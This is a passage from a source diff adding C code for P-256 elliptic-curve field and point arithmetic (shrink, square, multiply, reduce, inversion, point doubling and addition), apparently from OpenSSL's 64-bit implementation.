+    /* add 0 mod p to avoid underflow */
+    out[0] += two70m8p6;
+    out[1] += two70p40;
+    out[2] += two70;
+    out[3] += two70m40m38p6;
+    out[4] += two70m6;
+    out[5] += two70m6;
+    out[6] += two70m6;
+    out[7] += two70m6;
+
+    /* in[i] < 7*2^67 < 2^70 - 2^40 - 2^38 + 2^6 */
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+    out[4] -= in[4];
+    out[5] -= in[5];
+    out[6] -= in[6];
+    out[7] -= in[7];
+}
+
+# define two64m0 (((limb)1) << 64) - 1
+# define two110p32m0 (((limb)1) << 110) + (((limb)1) << 32) - 1
+# define two64m46 (((limb)1) << 64) - (((limb)1) << 46)
+# define two64m32 (((limb)1) << 64) - (((limb)1) << 32)
+
+/* zero110 is 0 mod p */
+static const felem zero110 = { two64m0, two110p32m0, two64m46, two64m32 };
+
+/*-
+ * felem_shrink converts an felem into a smallfelem. The result isn't quite
+ * minimal as the value may be greater than p.
+ *
+ * On entry:
+ *   in[i] < 2^109
+ * On exit:
+ *   out[i] < 2^64
+ */
+static void felem_shrink(smallfelem out, const felem in)
+{
+    felem tmp;
+    u64 a, b, mask;
+    s64 high, low;
+    static const u64 kPrime3Test = 0x7fffffff00000001ul; /* 2^63 - 2^32 + 1 */
+
+    /* Carry 2->3 */
+    tmp[3] = zero110[3] + in[3] + ((u64)(in[2] >> 64));
+    /* tmp[3] < 2^110 */
+
+    tmp[2] = zero110[2] + (u64)in[2];
+    tmp[0] = zero110[0] + in[0];
+    tmp[1] = zero110[1] + in[1];
+    /* tmp[0] < 2**110, tmp[1] < 2^111, tmp[2] < 2**65 */
+
+    /*
+     * We perform two partial reductions where we eliminate the high-word of
+     * tmp[3]. We don't update the other words till the end.
+     */
+    a = tmp[3] >> 64;           /* a < 2^46 */
+    tmp[3] = (u64)tmp[3];
+    tmp[3] -= a;
+    tmp[3] += ((limb) a) << 32;
+    /* tmp[3] < 2^79 */
+
+    b = a;
+    a = tmp[3] >> 64;           /* a < 2^15 */
+    b += a;                     /* b < 2^46 + 2^15 < 2^47 */
+    tmp[3] = (u64)tmp[3];
+    tmp[3] -= a;
+    tmp[3] += ((limb) a) << 32;
+    /* tmp[3] < 2^64 + 2^47 */
+
+    /*
+     * This adjusts the other two words to complete the two partial
+     * reductions.
+     */
+    tmp[0] += b;
+    tmp[1] -= (((limb) b) << 32);
+
+    /*
+     * In order to make space in tmp[3] for the carry from 2 -> 3, we
+     * conditionally subtract kPrime if tmp[3] is large enough.
+     */
+    high = tmp[3] >> 64;
+    /* As tmp[3] < 2^65, high is either 1 or 0 */
+    high <<= 63;
+    high >>= 63;
+    /*-
+     * high is:
+     *   all ones   if the high word of tmp[3] is 1
+     *   all zeros  if the high word of tmp[3] if 0 */
+    low = tmp[3];
+    mask = low >> 63;
+    /*-
+     * mask is:
+     *   all ones   if the MSB of low is 1
+     *   all zeros  if the MSB of low if 0 */
+    low &= bottom63bits;
+    low -= kPrime3Test;
+    /* if low was greater than kPrime3Test then the MSB is zero */
+    low = ~low;
+    low >>= 63;
+    /*-
+     * low is:
+     *   all ones   if low was > kPrime3Test
+     *   all zeros  if low was <= kPrime3Test */
+    mask = (mask & low) | high;
+    tmp[0] -= mask & kPrime[0];
+    tmp[1] -= mask & kPrime[1];
+    /* kPrime[2] is zero, so omitted */
+    tmp[3] -= mask & kPrime[3];
+    /* tmp[3] < 2**64 - 2**32 + 1 */
+
+    tmp[1] += ((u64)(tmp[0] >> 64));
+    tmp[0] = (u64)tmp[0];
+    tmp[2] += ((u64)(tmp[1] >> 64));
+    tmp[1] = (u64)tmp[1];
+    tmp[3] += ((u64)(tmp[2] >> 64));
+    tmp[2] = (u64)tmp[2];
+    /* tmp[i] < 2^64 */
+
+    out[0] = tmp[0];
+    out[1] = tmp[1];
+    out[2] = tmp[2];
+    out[3] = tmp[3];
+}
+
+/* smallfelem_expand converts a smallfelem to an felem */
+static void smallfelem_expand(felem out, const smallfelem in)
+{
+    out[0] = in[0];
+    out[1] = in[1];
+    out[2] = in[2];
+    out[3] = in[3];
+}
+
+/*-
+ * smallfelem_square sets |out| = |small|^2
+ * On entry:
+ *   small[i] < 2^64
+ * On exit:
+ *   out[i] < 7 * 2^64 < 2^67
+ */
+static void smallfelem_square(longfelem out, const smallfelem small)
+{
+    limb a;
+    u64 high, low;
+
+    a = ((uint128_t) small[0]) * small[0];
+    low = a;
+    high = a >> 64;
+    out[0] = low;
+    out[1] = high;
+
+    a = ((uint128_t) small[0]) * small[1];
+    low = a;
+    high = a >> 64;
+    out[1] += low;
+    out[1] += low;
+    out[2] = high;
+
+    a = ((uint128_t) small[0]) * small[2];
+    low = a;
+    high = a >> 64;
+    out[2] += low;
+    out[2] *= 2;
+    out[3] = high;
+
+    a = ((uint128_t) small[0]) * small[3];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[4] = high;
+
+    a = ((uint128_t) small[1]) * small[2];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[3] *= 2;
+    out[4] += high;
+
+    a = ((uint128_t) small[1]) * small[1];
+    low = a;
+    high = a >> 64;
+    out[2] += low;
+    out[3] += high;
+
+    a = ((uint128_t) small[1]) * small[3];
+    low = a;
+    high = a >> 64;
+    out[4] += low;
+    out[4] *= 2;
+    out[5] = high;
+
+    a = ((uint128_t) small[2]) * small[3];
+    low = a;
+    high = a >> 64;
+    out[5] += low;
+    out[5] *= 2;
+    out[6] = high;
+    out[6] += high;
+
+    a = ((uint128_t) small[2]) * small[2];
+    low = a;
+    high = a >> 64;
+    out[4] += low;
+    out[5] += high;
+
+    a = ((uint128_t) small[3]) * small[3];
+    low = a;
+    high = a >> 64;
+    out[6] += low;
+    out[7] = high;
+}
+
+/*-
+ * felem_square sets |out| = |in|^2
+ * On entry:
+ *   in[i] < 2^109
+ * On exit:
+ *   out[i] < 7 * 2^64 < 2^67
+ */
+static void felem_square(longfelem out, const felem in)
+{
+    u64 small[4];
+    felem_shrink(small, in);
+    smallfelem_square(out, small);
+}
+
+/*-
+ * smallfelem_mul sets |out| = |small1| * |small2|
+ * On entry:
+ *   small1[i] < 2^64
+ *   small2[i] < 2^64
+ * On exit:
+ *   out[i] < 7 * 2^64 < 2^67
+ */
+static void smallfelem_mul(longfelem out, const smallfelem small1,
+                           const smallfelem small2)
+{
+    limb a;
+    u64 high, low;
+
+    a = ((uint128_t) small1[0]) * small2[0];
+    low = a;
+    high = a >> 64;
+    out[0] = low;
+    out[1] = high;
+
+    a = ((uint128_t) small1[0]) * small2[1];
+    low = a;
+    high = a >> 64;
+    out[1] += low;
+    out[2] = high;
+
+    a = ((uint128_t) small1[1]) * small2[0];
+    low = a;
+    high = a >> 64;
+    out[1] += low;
+    out[2] += high;
+
+    a = ((uint128_t) small1[0]) * small2[2];
+    low = a;
+    high = a >> 64;
+    out[2] += low;
+    out[3] = high;
+
+    a = ((uint128_t) small1[1]) * small2[1];
+    low = a;
+    high = a >> 64;
+    out[2] += low;
+    out[3] += high;
+
+    a = ((uint128_t) small1[2]) * small2[0];
+    low = a;
+    high = a >> 64;
+    out[2] += low;
+    out[3] += high;
+
+    a = ((uint128_t) small1[0]) * small2[3];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[4] = high;
+
+    a = ((uint128_t) small1[1]) * small2[2];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[4] += high;
+
+    a = ((uint128_t) small1[2]) * small2[1];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[4] += high;
+
+    a = ((uint128_t) small1[3]) * small2[0];
+    low = a;
+    high = a >> 64;
+    out[3] += low;
+    out[4] += high;
+
+    a = ((uint128_t) small1[1]) * small2[3];
+    low = a;
+    high = a >> 64;
+    out[4] += low;
+    out[5] = high;
+
+    a = ((uint128_t) small1[2]) * small2[2];
+    low = a;
+    high = a >> 64;
+    out[4] += low;
+    out[5] += high;
+
+    a = ((uint128_t) small1[3]) * small2[1];
+    low = a;
+    high = a >> 64;
+    out[4] += low;
+    out[5] += high;
+
+    a = ((uint128_t) small1[2]) * small2[3];
+    low = a;
+    high = a >> 64;
+    out[5] += low;
+    out[6] = high;
+
+    a = ((uint128_t) small1[3]) * small2[2];
+    low = a;
+    high = a >> 64;
+    out[5] += low;
+    out[6] += high;
+
+    a = ((uint128_t) small1[3]) * small2[3];
+    low = a;
+    high = a >> 64;
+    out[6] += low;
+    out[7] = high;
+}
+
+/*-
+ * felem_mul sets |out| = |in1| * |in2|
+ * On entry:
+ *   in1[i] < 2^109
+ *   in2[i] < 2^109
+ * On exit:
+ *   out[i] < 7 * 2^64 < 2^67
+ */
+static void felem_mul(longfelem out, const felem in1, const felem in2)
+{
+    smallfelem small1, small2;
+    felem_shrink(small1, in1);
+    felem_shrink(small2, in2);
+    smallfelem_mul(out, small1, small2);
+}
+
+/*-
+ * felem_small_mul sets |out| = |small1| * |in2|
+ * On entry:
+ *   small1[i] < 2^64
+ *   in2[i] < 2^109
+ * On exit:
+ *   out[i] < 7 * 2^64 < 2^67
+ */
+static void felem_small_mul(longfelem out, const smallfelem small1,
+                            const felem in2)
+{
+    smallfelem small2;
+    felem_shrink(small2, in2);
+    smallfelem_mul(out, small1, small2);
+}
+
+# define two100m36m4 (((limb)1) << 100) - (((limb)1) << 36) - (((limb)1) << 4)
+# define two100 (((limb)1) << 100)
+# define two100m36p4 (((limb)1) << 100) - (((limb)1) << 36) + (((limb)1) << 4)
+/* zero100 is 0 mod p */
+static const felem zero100 =
+    { two100m36m4, two100, two100m36p4, two100m36p4 };
+
+/*-
+ * Internal function for the different flavours of felem_reduce.
+ * felem_reduce_ reduces the higher coefficients in[4]-in[7].
+ * On entry:
+ *   out[0] >= in[6] + 2^32*in[6] + in[7] + 2^32*in[7]
+ *   out[1] >= in[7] + 2^32*in[4]
+ *   out[2] >= in[5] + 2^32*in[5]
+ *   out[3] >= in[4] + 2^32*in[5] + 2^32*in[6]
+ * On exit:
+ *   out[0] <= out[0] + in[4] + 2^32*in[5]
+ *   out[1] <= out[1] + in[5] + 2^33*in[6]
+ *   out[2] <= out[2] + in[7] + 2*in[6] + 2^33*in[7]
+ *   out[3] <= out[3] + 2^32*in[4] + 3*in[7]
+ */
+static void felem_reduce_(felem out, const longfelem in)
+{
+    int128_t c;
+    /* combine common terms from below */
+    c = in[4] + (in[5] << 32);
+    out[0] += c;
+    out[3] -= c;
+
+    c = in[5] - in[7];
+    out[1] += c;
+    out[2] -= c;
+
+    /* the remaining terms */
+    /* 256: [(0,1),(96,-1),(192,-1),(224,1)] */
+    out[1] -= (in[4] << 32);
+    out[3] += (in[4] << 32);
+
+    /* 320: [(32,1),(64,1),(128,-1),(160,-1),(224,-1)] */
+    out[2] -= (in[5] << 32);
+
+    /* 384: [(0,-1),(32,-1),(96,2),(128,2),(224,-1)] */
+    out[0] -= in[6];
+    out[0] -= (in[6] << 32);
+    out[1] += (in[6] << 33);
+    out[2] += (in[6] * 2);
+    out[3] -= (in[6] << 32);
+
+    /* 448: [(0,-1),(32,-1),(64,-1),(128,1),(160,2),(192,3)] */
+    out[0] -= in[7];
+    out[0] -= (in[7] << 32);
+    out[2] += (in[7] << 33);
+    out[3] += (in[7] * 3);
+}
+
+/*-
+ * felem_reduce converts a longfelem into an felem.
+ * To be called directly after felem_square or felem_mul.
+ * On entry:
+ *   in[0] < 2^64, in[1] < 3*2^64, in[2] < 5*2^64, in[3] < 7*2^64
+ *   in[4] < 7*2^64, in[5] < 5*2^64, in[6] < 3*2^64, in[7] < 2*64
+ * On exit:
+ *   out[i] < 2^101
+ */
+static void felem_reduce(felem out, const longfelem in)
+{
+    out[0] = zero100[0] + in[0];
+    out[1] = zero100[1] + in[1];
+    out[2] = zero100[2] + in[2];
+    out[3] = zero100[3] + in[3];
+
+    felem_reduce_(out, in);
+
+    /*-
+     * out[0] > 2^100 - 2^36 - 2^4 - 3*2^64 - 3*2^96 - 2^64 - 2^96 > 0
+     * out[1] > 2^100 - 2^64 - 7*2^96 > 0
+     * out[2] > 2^100 - 2^36 + 2^4 - 5*2^64 - 5*2^96 > 0
+     * out[3] > 2^100 - 2^36 + 2^4 - 7*2^64 - 5*2^96 - 3*2^96 > 0
+     *
+     * out[0] < 2^100 + 2^64 + 7*2^64 + 5*2^96 < 2^101
+     * out[1] < 2^100 + 3*2^64 + 5*2^64 + 3*2^97 < 2^101
+     * out[2] < 2^100 + 5*2^64 + 2^64 + 3*2^65 + 2^97 < 2^101
+     * out[3] < 2^100 + 7*2^64 + 7*2^96 + 3*2^64 < 2^101
+     */
+}
+
+/*-
+ * felem_reduce_zero105 converts a larger longfelem into an felem.
+ * On entry:
+ *   in[0] < 2^71
+ * On exit:
+ *   out[i] < 2^106
+ */
+static void felem_reduce_zero105(felem out, const longfelem in)
+{
+    out[0] = zero105[0] + in[0];
+    out[1] = zero105[1] + in[1];
+    out[2] = zero105[2] + in[2];
+    out[3] = zero105[3] + in[3];
+
+    felem_reduce_(out, in);
+
+    /*-
+     * out[0] > 2^105 - 2^41 - 2^9 - 2^71 - 2^103 - 2^71 - 2^103 > 0
+     * out[1] > 2^105 - 2^71 - 2^103 > 0
+     * out[2] > 2^105 - 2^41 + 2^9 - 2^71 - 2^103 > 0
+     * out[3] > 2^105 - 2^41 + 2^9 - 2^71 - 2^103 - 2^103 > 0
+     *
+     * out[0] < 2^105 + 2^71 + 2^71 + 2^103 < 2^106
+     * out[1] < 2^105 + 2^71 + 2^71 + 2^103 < 2^106
+     * out[2] < 2^105 + 2^71 + 2^71 + 2^71 + 2^103 < 2^106
+     * out[3] < 2^105 + 2^71 + 2^103 + 2^71 < 2^106
+     */
+}
+
+/*
+ * subtract_u64 sets *result = *result - v and *carry to one if the
+ * subtraction underflowed.
+ */
+static void subtract_u64(u64 *result, u64 *carry, u64 v)
+{
+    uint128_t r = *result;
+    r -= v;
+    *carry = (r >> 64) & 1;
+    *result = (u64)r;
+}
+
+/*
+ * felem_contract converts |in| to its unique, minimal representation. On
+ * entry: in[i] < 2^109
+ */
+static void felem_contract(smallfelem out, const felem in)
+{
+    unsigned i;
+    u64 all_equal_so_far = 0, result = 0, carry;
+
+    felem_shrink(out, in);
+    /* small is minimal except that the value might be > p */
+
+    all_equal_so_far--;
+    /*
+     * We are doing a constant time test if out >= kPrime. We need to compare
+     * each u64, from most-significant to least significant. For each one, if
+     * all words so far have been equal (m is all ones) then a non-equal
+     * result is the answer. Otherwise we continue.
+     */
+    for (i = 3; i < 4; i--) {
+        u64 equal;
+        uint128_t a = ((uint128_t) kPrime[i]) - out[i];
+        /*
+         * if out[i] > kPrime[i] then a will underflow and the high 64-bits
+         * will all be set.
+         */
+        result |= all_equal_so_far & ((u64)(a >> 64));
+
+        /*
+         * if kPrime[i] == out[i] then |equal| will be all zeros and the
+         * decrement will make it all ones.
+         */
+        equal = kPrime[i] ^ out[i];
+        equal--;
+        equal &= equal << 32;
+        equal &= equal << 16;
+        equal &= equal << 8;
+        equal &= equal << 4;
+        equal &= equal << 2;
+        equal &= equal << 1;
+        equal = ((s64) equal) >> 63;
+
+        all_equal_so_far &= equal;
+    }
+
+    /*
+     * if all_equal_so_far is still all ones then the two values are equal
+     * and so out >= kPrime is true.
+     */
+    result |= all_equal_so_far;
+
+    /* if out >= kPrime then we subtract kPrime. */
+    subtract_u64(&out[0], &carry, result & kPrime[0]);
+    subtract_u64(&out[1], &carry, carry);
+    subtract_u64(&out[2], &carry, carry);
+    subtract_u64(&out[3], &carry, carry);
+
+    subtract_u64(&out[1], &carry, result & kPrime[1]);
+    subtract_u64(&out[2], &carry, carry);
+    subtract_u64(&out[3], &carry, carry);
+
+    subtract_u64(&out[2], &carry, result & kPrime[2]);
+    subtract_u64(&out[3], &carry, carry);
+
+    subtract_u64(&out[3], &carry, result & kPrime[3]);
+}
+
+static void smallfelem_square_contract(smallfelem out, const smallfelem in)
+{
+    longfelem longtmp;
+    felem tmp;
+
+    smallfelem_square(longtmp, in);
+    felem_reduce(tmp, longtmp);
+    felem_contract(out, tmp);
+}
+
+static void smallfelem_mul_contract(smallfelem out, const smallfelem in1,
+                                    const smallfelem in2)
+{
+    longfelem longtmp;
+    felem tmp;
+
+    smallfelem_mul(longtmp, in1, in2);
+    felem_reduce(tmp, longtmp);
+    felem_contract(out, tmp);
+}
+
+/*-
+ * felem_is_zero returns a limb with all bits set if |in| == 0 (mod p) and 0
+ * otherwise.
+ * On entry:
+ *   small[i] < 2^64
+ */
+static limb smallfelem_is_zero(const smallfelem small)
+{
+    limb result;
+    u64 is_p;
+
+    u64 is_zero = small[0] | small[1] | small[2] | small[3];
+    is_zero--;
+    is_zero &= is_zero << 32;
+    is_zero &= is_zero << 16;
+    is_zero &= is_zero << 8;
+    is_zero &= is_zero << 4;
+    is_zero &= is_zero << 2;
+    is_zero &= is_zero << 1;
+    is_zero = ((s64) is_zero) >> 63;
+
+    is_p = (small[0] ^ kPrime[0]) |
+        (small[1] ^ kPrime[1]) |
+        (small[2] ^ kPrime[2]) | (small[3] ^ kPrime[3]);
+    is_p--;
+    is_p &= is_p << 32;
+    is_p &= is_p << 16;
+    is_p &= is_p << 8;
+    is_p &= is_p << 4;
+    is_p &= is_p << 2;
+    is_p &= is_p << 1;
+    is_p = ((s64) is_p) >> 63;
+
+    is_zero |= is_p;
+
+    result = is_zero;
+    result |= ((limb) is_zero) << 64;
+    return result;
+}
+
+static int smallfelem_is_zero_int(const smallfelem small)
+{
+    return (int)(smallfelem_is_zero(small) & ((limb) 1));
+}
+
+/*-
+ * felem_inv calculates |out| = |in|^{-1}
+ *
+ * Based on Fermat's Little Theorem:
+ *   a^p = a (mod p)
+ *   a^{p-1} = 1 (mod p)
+ *   a^{p-2} = a^{-1} (mod p)
+ */
+static void felem_inv(felem out, const felem in)
+{
+    felem ftmp, ftmp2;
+    /* each e_I will hold |in|^{2^I - 1} */
+    felem e2, e4, e8, e16, e32, e64;
+    longfelem tmp;
+    unsigned i;
+
+    felem_square(tmp, in);
+    felem_reduce(ftmp, tmp);    /* 2^1 */
+    felem_mul(tmp, in, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^2 - 2^0 */
+    felem_assign(e2, ftmp);
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^3 - 2^1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^4 - 2^2 */
+    felem_mul(tmp, ftmp, e2);
+    felem_reduce(ftmp, tmp);    /* 2^4 - 2^0 */
+    felem_assign(e4, ftmp);
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^5 - 2^1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^6 - 2^2 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^7 - 2^3 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^8 - 2^4 */
+    felem_mul(tmp, ftmp, e4);
+    felem_reduce(ftmp, tmp);    /* 2^8 - 2^0 */
+    felem_assign(e8, ftmp);
+    for (i = 0; i < 8; i++) {
+        felem_square(tmp, ftmp);
+        felem_reduce(ftmp, tmp);
+    }                           /* 2^16 - 2^8 */
+    felem_mul(tmp, ftmp, e8);
+    felem_reduce(ftmp, tmp);    /* 2^16 - 2^0 */
+    felem_assign(e16, ftmp);
+    for (i = 0; i < 16; i++) {
+        felem_square(tmp, ftmp);
+        felem_reduce(ftmp, tmp);
+    }                           /* 2^32 - 2^16 */
+    felem_mul(tmp, ftmp, e16);
+    felem_reduce(ftmp, tmp);    /* 2^32 - 2^0 */
+    felem_assign(e32, ftmp);
+    for (i = 0; i < 32; i++) {
+        felem_square(tmp, ftmp);
+        felem_reduce(ftmp, tmp);
+    }                           /* 2^64 - 2^32 */
+    felem_assign(e64, ftmp);
+    felem_mul(tmp, ftmp, in);
+    felem_reduce(ftmp, tmp);    /* 2^64 - 2^32 + 2^0 */
+    for (i = 0; i < 192; i++) {
+        felem_square(tmp, ftmp);
+        felem_reduce(ftmp, tmp);
+    }                           /* 2^256 - 2^224 + 2^192 */
+
+    felem_mul(tmp, e64, e32);
+    felem_reduce(ftmp2, tmp);   /* 2^64 - 2^0 */
+    for (i = 0; i < 16; i++) {
+        felem_square(tmp, ftmp2);
+        felem_reduce(ftmp2, tmp);
+    }                           /* 2^80 - 2^16 */
+    felem_mul(tmp, ftmp2, e16);
+    felem_reduce(ftmp2, tmp);   /* 2^80 - 2^0 */
+    for (i = 0; i < 8; i++) {
+        felem_square(tmp, ftmp2);
+        felem_reduce(ftmp2, tmp);
+    }                           /* 2^88 - 2^8 */
+    felem_mul(tmp, ftmp2, e8);
+    felem_reduce(ftmp2, tmp);   /* 2^88 - 2^0 */
+    for (i = 0; i < 4; i++) {
+        felem_square(tmp, ftmp2);
+        felem_reduce(ftmp2, tmp);
+    }                           /* 2^92 - 2^4 */
+    felem_mul(tmp, ftmp2, e4);
+    felem_reduce(ftmp2, tmp);   /* 2^92 - 2^0 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^93 - 2^1 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^94 - 2^2 */
+    felem_mul(tmp, ftmp2, e2);
+    felem_reduce(ftmp2, tmp);   /* 2^94 - 2^0 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^95 - 2^1 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^96 - 2^2 */
+    felem_mul(tmp, ftmp2, in);
+    felem_reduce(ftmp2, tmp);   /* 2^96 - 3 */
+
+    felem_mul(tmp, ftmp2, ftmp);
+    felem_reduce(out, tmp);     /* 2^256 - 2^224 + 2^192 + 2^96 - 3 */
+}
+
+static void smallfelem_inv_contract(smallfelem out, const smallfelem in)
+{
+    felem tmp;
+
+    smallfelem_expand(tmp, in);
+    felem_inv(tmp, tmp);
+    felem_contract(out, tmp);
+}
+
+/*-
+ * Group operations
+ * ----------------
+ *
+ * Building on top of the field operations we have the operations on the
+ * elliptic curve group itself. Points on the curve are represented in Jacobian
+ * coordinates
+ */
+
+/*-
+ * point_double calculates 2*(x_in, y_in, z_in)
+ *
+ * The method is taken from:
+ *   http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html#doubling-dbl-2001-b
+ *
+ * Outputs can equal corresponding inputs, i.e., x_out == x_in is allowed.
+ * while x_out == y_in is not (maybe this works, but it's not tested).
+ */
+static void
+point_double(felem x_out, felem y_out, felem z_out,
+             const felem x_in, const felem y_in, const felem z_in)
+{
+    longfelem tmp, tmp2;
+    felem delta, gamma, beta, alpha, ftmp, ftmp2;
+    smallfelem small1, small2;
+
+    felem_assign(ftmp, x_in);
+    /* ftmp[i] < 2^106 */
+    felem_assign(ftmp2, x_in);
+    /* ftmp2[i] < 2^106 */
+
+    /* delta = z^2 */
+    felem_square(tmp, z_in);
+    felem_reduce(delta, tmp);
+    /* delta[i] < 2^101 */
+
+    /* gamma = y^2 */
+    felem_square(tmp, y_in);
+    felem_reduce(gamma, tmp);
+    /* gamma[i] < 2^101 */
+    felem_shrink(small1, gamma);
+
+    /* beta = x*gamma */
+    felem_small_mul(tmp, small1, x_in);
+    felem_reduce(beta, tmp);
+    /* beta[i] < 2^101 */
+
+    /* alpha = 3*(x-delta)*(x+delta) */
+    felem_diff(ftmp, delta);
+    /* ftmp[i] < 2^105 + 2^106 < 2^107 */
+    felem_sum(ftmp2, delta);
+    /* ftmp2[i] < 2^105 + 2^106 < 2^107 */
+    felem_scalar(ftmp2, 3);
+    /* ftmp2[i] < 3 * 2^107 < 2^109 */
+    felem_mul(tmp, ftmp, ftmp2);
+    felem_reduce(alpha, tmp);
+    /* alpha[i] < 2^101 */
+    felem_shrink(small2, alpha);
+
+    /* x' = alpha^2 - 8*beta */
+    smallfelem_square(tmp, small2);
+    felem_reduce(x_out, tmp);
+    felem_assign(ftmp, beta);
+    felem_scalar(ftmp, 8);
+    /* ftmp[i] < 8 * 2^101 = 2^104 */
+    felem_diff(x_out, ftmp);
+    /* x_out[i] < 2^105 + 2^101 < 2^106 */
+
+    /* z' = (y + z)^2 - gamma - delta */
+    felem_sum(delta, gamma);
+    /* delta[i] < 2^101 + 2^101 = 2^102 */
+    felem_assign(ftmp, y_in);
+    felem_sum(ftmp, z_in);
+    /* ftmp[i] < 2^106 + 2^106 = 2^107 */
+    felem_square(tmp, ftmp);
+    felem_reduce(z_out, tmp);
+    felem_diff(z_out, delta);
+    /* z_out[i] < 2^105 + 2^101 < 2^106 */
+
+    /* y' = alpha*(4*beta - x') - 8*gamma^2 */
+    felem_scalar(beta, 4);
+    /* beta[i] < 4 * 2^101 = 2^103 */
+    felem_diff_zero107(beta, x_out);
+    /* beta[i] < 2^107 + 2^103 < 2^108 */
+    felem_small_mul(tmp, small2, beta);
+    /* tmp[i] < 7 * 2^64 < 2^67 */
+    smallfelem_square(tmp2, small1);
+    /* tmp2[i] < 7 * 2^64 */
+    longfelem_scalar(tmp2, 8);
+    /* tmp2[i] < 8 * 7 * 2^64 = 7 * 2^67 */
+    longfelem_diff(tmp, tmp2);
+    /* tmp[i] < 2^67 + 2^70 + 2^40 < 2^71 */
+    felem_reduce_zero105(y_out, tmp);
+    /* y_out[i] < 2^106 */
+}
+
+/*
+ * point_double_small is the same as point_double, except that it operates on
+ * smallfelems
+ */
+static void
+point_double_small(smallfelem x_out, smallfelem y_out, smallfelem z_out,
+                   const smallfelem x_in, const smallfelem y_in,
+                   const smallfelem z_in)
+{
+    felem felem_x_out, felem_y_out, felem_z_out;
+    felem felem_x_in, felem_y_in, felem_z_in;
+
+    smallfelem_expand(felem_x_in, x_in);
+    smallfelem_expand(felem_y_in, y_in);
+    smallfelem_expand(felem_z_in, z_in);
+    point_double(felem_x_out, felem_y_out, felem_z_out,
+                 felem_x_in, felem_y_in, felem_z_in);
+    felem_shrink(x_out, felem_x_out);
+    felem_shrink(y_out, felem_y_out);
+    felem_shrink(z_out, felem_z_out);
+}
+
+/* copy_conditional copies in to out iff mask is all ones. */
+static void copy_conditional(felem out, const felem in, limb mask)
+{
+    unsigned i;
+    for (i = 0; i < NLIMBS; ++i) {
+        const limb tmp = mask & (in[i] ^ out[i]);
+        out[i] ^= tmp;
+    }
+}
+
+/* copy_small_conditional copies in to out iff mask is all ones. */
+static void copy_small_conditional(felem out, const smallfelem in, limb mask)
+{
+    unsigned i;
+    const u64 mask64 = mask;
+    for (i = 0; i < NLIMBS; ++i) {
+        out[i] = ((limb) (in[i] & mask64)) | (out[i] & ~mask);
+    }
+}
+
+/*-
+ * point_add calcuates (x1, y1, z1) + (x2, y2, z2)
+ *
+ * The method is taken from:
+ *   http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html#addition-add-2007-bl,
+ * adapted for mixed addition (z2 = 1, or z2 = 0 for the point at infinity).
+ *
+ * This function includes a branch for checking whether the two input points
+ * are equal, (while not equal to the point at infinity). This case never
+ * happens during single point multiplication, so there is no timing leak for
+ * ECDH or ECDSA signing.
+ */
+static void point_add(felem x3, felem y3, felem z3,
+                      const felem x1, const felem y1, const felem z1,
+                      const int mixed, const smallfelem x2,
+                      const smallfelem y2, const smallfelem z2)
+{
+    felem ftmp, ftmp2, ftmp3, ftmp4, ftmp5, ftmp6, x_out, y_out, z_out;
+    longfelem tmp, tmp2;
+    smallfelem small1, small2, small3, small4, small5;
+    limb x_equal, y_equal, z1_is_zero, z2_is_zero;
+
+    felem_shrink(small3, z1);
+
+    z1_is_zero = smallfelem_is_zero(small3);
+    z2_is_zero = smallfelem_is_zero(z2);
+
+    /* ftmp = z1z1 = z1**2 */
+    smallfelem_square(tmp, small3);
+    felem_reduce(ftmp, tmp);
+    /* ftmp[i] < 2^101 */
+    felem_shrink(small1, ftmp);
+
+    if (!mixed) {
+        /* ftmp2 = z2z2 = z2**2 */
+        smallfelem_square(tmp, z2);
+        felem_reduce(ftmp2, tmp);
+        /* ftmp2[i] < 2^101 */
+        felem_shrink(small2, ftmp2);
+
+        felem_shrink(small5, x1);
+
+        /* u1 = ftmp3 = x1*z2z2 */
+        smallfelem_mul(tmp, small5, small2);
+        felem_reduce(ftmp3, tmp);
+        /* ftmp3[i] < 2^101 */
+
+        /* ftmp5 = z1 + z2 */
+        felem_assign(ftmp5, z1);
+        felem_small_sum(ftmp5, z2);
+        /* ftmp5[i] < 2^107 */
+
+        /* ftmp5 = (z1 + z2)**2 - (z1z1 + z2z2) = 2z1z2 */
+        felem_square(tmp, ftmp5);
+        felem_reduce(ftmp5, tmp);
+        /* ftmp2 = z2z2 + z1z1 */
+        felem_sum(ftmp2, ftmp);
+        /* ftmp2[i] < 2^101 + 2^101 = 2^102 */
+        felem_diff(ftmp5, ftmp2);
+        /* ftmp5[i] < 2^105 + 2^101 < 2^106 */
+
+        /* ftmp2 = z2 * z2z2 */
+        smallfelem_mul(tmp, small2, z2);
+        felem_reduce(ftmp2, tmp);
+
+        /* s1 = ftmp2 = y1 * z2**3 */
+        felem_mul(tmp, y1, ftmp2);
+        felem_reduce(ftmp6, tmp);
+        /* ftmp6[i] < 2^101 */
+    } else {
+        /*
+         * We'll assume z2 = 1 (special case z2 = 0 is handled later)
+         */
+
+        /* u1 = ftmp3 = x1*z2z2 */
+        felem_assign(ftmp3, x1);
+        /* ftmp3[i] < 2^106 */
+
+        /* ftmp5 = 2z1z2 */
+        felem_assign(ftmp5, z1);
+        felem_scalar(ftmp5, 2);
+        /* ftmp5[i] < 2*2^106 = 2^107 */
+
+        /* s1 = ftmp2 = y1 * z2**3 */
